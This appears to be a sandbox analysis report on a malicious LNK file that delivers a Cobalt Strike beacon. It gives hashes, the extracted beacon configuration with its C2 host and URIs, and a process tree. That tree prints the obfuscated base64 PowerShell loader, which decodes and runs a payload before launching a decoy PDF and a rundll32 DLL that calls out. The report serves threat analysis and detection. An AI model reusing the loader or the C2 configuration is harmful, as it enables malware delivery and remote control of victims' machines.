Analysis
-
max time kernel
151s -
max time network
47s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
26-12-2020 20:45
Static task
static1
Behavioral task
behavioral1
Sample
ds7002.lnk
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ds7002.lnk
Resource
win10v20201028
General
-
Target
ds7002.lnk
-
Size
392KB
-
MD5
6ed0020b0851fb71d5b0076f4ee95f3c
-
SHA1
e431261c63f94a174a1308defccc674dabbe3609
-
SHA256
2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
-
SHA512
2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted
cobaltstrike
http://pandorasong.com:443/access/
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
pandorasong.com,/access/
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
4352
-
maxdns
255
-
month
0
-
pipe_name
\\%s\pipe\msagent_%x
-
polling_time
300000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
7.382016e+08
-
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.350256387e+09
-
uri
/radio/xmlrpc/v45
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 7 1092 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1092 rundll32.exe -
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 2016 powershell.exe 2016 powershell.exe 2016 powershell.exe 2016 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 1824 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2016 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
AcroRd32.exepid process 1824 AcroRd32.exe 1824 AcroRd32.exe 1824 AcroRd32.exe 1824 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exepowershell.execsc.execsc.exedescription pid process target process PID 1048 wrote to memory of 2016 1048 cmd.exe powershell.exe PID 1048 wrote to memory of 2016 1048 cmd.exe powershell.exe PID 1048 wrote to memory of 2016 1048 cmd.exe powershell.exe PID 2016 wrote to memory of 1468 2016 powershell.exe csc.exe PID 2016 wrote to memory of 1468 2016 powershell.exe csc.exe PID 2016 wrote to memory of 1468 2016 powershell.exe csc.exe PID 1468 wrote to memory of 1328 1468 csc.exe cvtres.exe PID 1468 wrote to memory of 1328 1468 csc.exe cvtres.exe PID 1468 wrote to memory of 1328 1468 csc.exe cvtres.exe PID 2016 wrote to memory of 340 2016 powershell.exe csc.exe PID 2016 wrote to memory of 340 2016 powershell.exe csc.exe PID 2016 wrote to memory of 340 2016 powershell.exe csc.exe PID 340 wrote to memory of 432 340 csc.exe cvtres.exe PID 340 wrote to memory of 432 340 csc.exe cvtres.exe PID 340 wrote to memory of 432 340 csc.exe cvtres.exe PID 2016 wrote to memory of 1824 2016 powershell.exe AcroRd32.exe PID 2016 wrote to memory of 1824 2016 powershell.exe AcroRd32.exe PID 2016 wrote to memory of 1824 2016 powershell.exe AcroRd32.exe PID 2016 wrote to memory of 1824 2016 powershell.exe AcroRd32.exe PID 2016 wrote to memory of 1092 2016 powershell.exe rundll32.exe PID 2016 wrote to memory of 1092 2016 powershell.exe rundll32.exe PID 2016 wrote to memory of 1092 2016 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B5B.tmp" "c:\Users\Admin\AppData\Local\Temp\gkhq2szw\CSC8CF4C778B25428885EF4C7F50B9CE52.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C07.tmp" "c:\Users\Admin\AppData\Local\Temp\afkxno03\CSC44D10F4CAF2E4BCCB8FE2B3530CB558C.TMP"4⤵
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES3B5B.tmpMD5
9ce87fcc9ac0d30aad3c1cc2f8fe9725
SHA176fc443aef1f78529027f3a3c13ee9b692e975b9
SHA2560b7a6cd56792238b652e7e12f441cbf93a28bba9b218904b8b8278c82c35ec68
SHA512a78a713ab1192cd6e9591ab7b6de50385b80b7448ccdc094e19c3cc613e1735e0ef88f798cd5762766c49ef3712339873b7a7a80ab047f8cde1041d7c176a4bc
-
C:\Users\Admin\AppData\Local\Temp\RES3C07.tmpMD5
70c5ceb9b18d9423be49dbbd47f249eb
SHA1b1b0aed8831f1cea9f34f63baa387c41ce9a9ea0
SHA25686c5393793a1ea7fdb572aa9af0300cacbcc7684d4d1de191e4b47d36d9295f1
SHA512a39a755f5718722046b139f0e49cc50feec833f5a082158cefe6170a2715cbbe7f74d60f9cf13565cdac03ba91b58fd76c28d05ba7126843d15e3313ef6fb422
-
C:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.dllMD5
75131e6de34693b469c8ac4d95db71c2
SHA1d7f3c2df82ed5f1c92226b13a7f4599591a835db
SHA2565ef4ddd82f4c0f00102a11910a1916121c66ba59acb6412fd92287fbe17fe702
SHA512acd68554d5638422b01e941f9415adfed944680916ff874d0cf9dc81f0075a118b783055dfbd19336c6d05d5fdf7b1294721668c925da1e357d166f66af7664e
-
C:\Users\Admin\AppData\Local\Temp\ds7002.PDFMD5
313f4808aa2a2073005d219bc68971cd
SHA1053fb60530e884851eb8b6aebbec4570ec788d4a
SHA256b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
SHA5121d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
-
C:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.dllMD5
2cc581106f4fb709652a076a98be5cab
SHA1751583b188952b5cb82702f6d1fe77909492fd07
SHA2564f45532f439329c3903d95ca98f608fe162dd5837ee96be6d229b7465ff7c867
SHA51262e31ac227ffae973be5b77940d763b94582a313e4444c457fc8bfcc3228c42eec79f0d626be231c5c0f034ccb5de30b4b2b13932ae49cc94f42aeb7c4806382
-
C:\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\CSC44D10F4CAF2E4BCCB8FE2B3530CB558C.TMPMD5
f0dae506cb4b6a151d20c3ef92994bc6
SHA1fec248adb94d4e694bf7917ebed255253916336a
SHA256f5aba728e2c829652008f0a4363bdff20a56e75cd18cb63cfeea3ea128aa04ae
SHA5125c02eff30fa7409abbcb88a86cfd4188e9f5dddd97bd5295e8c5d2e253b52305d4b0219354e431fdcbf04a33c273106624603256fdc9c91245055ef728b1f71b
-
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.0.csMD5
171a88ab4fad87acfd2e5032eb0c6113
SHA1754de0e7656c558d335710fc41cbf196d39c1a19
SHA2565473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
SHA51287ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
-
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.cmdlineMD5
d683f5d5b34b38854af2717581282ea1
SHA11652f310ddbfc1096be76c3b881ec6a1d9c47325
SHA25607891ed2e8e22e93d569d9febbb17e78242d0490c1f211184662d1db40741037
SHA5122ba5f26cda0563aa23f9525faf65ef6b76f703e8896f43b6653765139c4a950da3ec15634e3196ca736625cfa25ea8233054e86f9566623653fa7ce76bf1b50c
-
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\CSC8CF4C778B25428885EF4C7F50B9CE52.TMPMD5
01740e75e51dc0746ce28a43c042c62e
SHA1cf76dbc305f364b6a55adf1e7a0d72ab38771ae7
SHA25621af03fd27d47acc91cb5e592ba1aab85ee1ad6856ba43aba832405c88425906
SHA5127eeb3780d78689a256717eacb418f2820b4494aca1900ba7a0a46dc615e2b871937c8482d509440c06cef91e90e865cec63280c5ea4f439293b5ce2ad400874e
-
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.0.csMD5
cdcb629e6587254315606a6ba3764745
SHA1d5b706ca48b7af8926926e80565148f725c75393
SHA2563c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
SHA51229f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
-
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.cmdlineMD5
c7991200eb269f2a338993f25b75eb66
SHA1b6ff8f448b4411641b980fd9344299c6e33dc9ac
SHA256a2dfb9828a7bc5a669e4d62672c79c3727cb3269a6c9da82a4a5d0016f0de1cc
SHA512c1fbf76b2d91bea096c89c9a55f981709fa3b47cfd59e3c20429aa28ac0d253dfd067567000005a7cb69ee5a2595b1370a90d34711955a965b5ff4aef256e61f
-
\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
memory/340-18-0x0000000000000000-mapping.dmp
-
memory/432-21-0x0000000000000000-mapping.dmp
-
memory/1092-32-0x0000000001B90000-0x0000000001C0E000-memory.dmpFilesize
504KB
-
memory/1092-31-0x0000000000320000-0x0000000000360000-memory.dmpFilesize
256KB
-
memory/1092-27-0x0000000000000000-mapping.dmp
-
memory/1328-13-0x0000000000000000-mapping.dmp
-
memory/1468-10-0x0000000000000000-mapping.dmp
-
memory/1824-26-0x0000000000000000-mapping.dmp
-
memory/2016-5-0x000000001AA60000-0x000000001AA61000-memory.dmpFilesize
4KB
-
memory/2016-4-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/2016-9-0x000000001C320000-0x000000001C321000-memory.dmpFilesize
4KB
-
memory/2016-25-0x000000001A9A0000-0x000000001A9A1000-memory.dmpFilesize
4KB
-
memory/2016-7-0x000000001A7E0000-0x000000001A7E1000-memory.dmpFilesize
4KB
-
memory/2016-8-0x000000001C250000-0x000000001C251000-memory.dmpFilesize
4KB
-
memory/2016-17-0x0000000002750000-0x0000000002751000-memory.dmpFilesize
4KB
-
memory/2016-3-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmpFilesize
9.9MB
-
memory/2016-2-0x0000000000000000-mapping.dmp
-
memory/2016-6-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB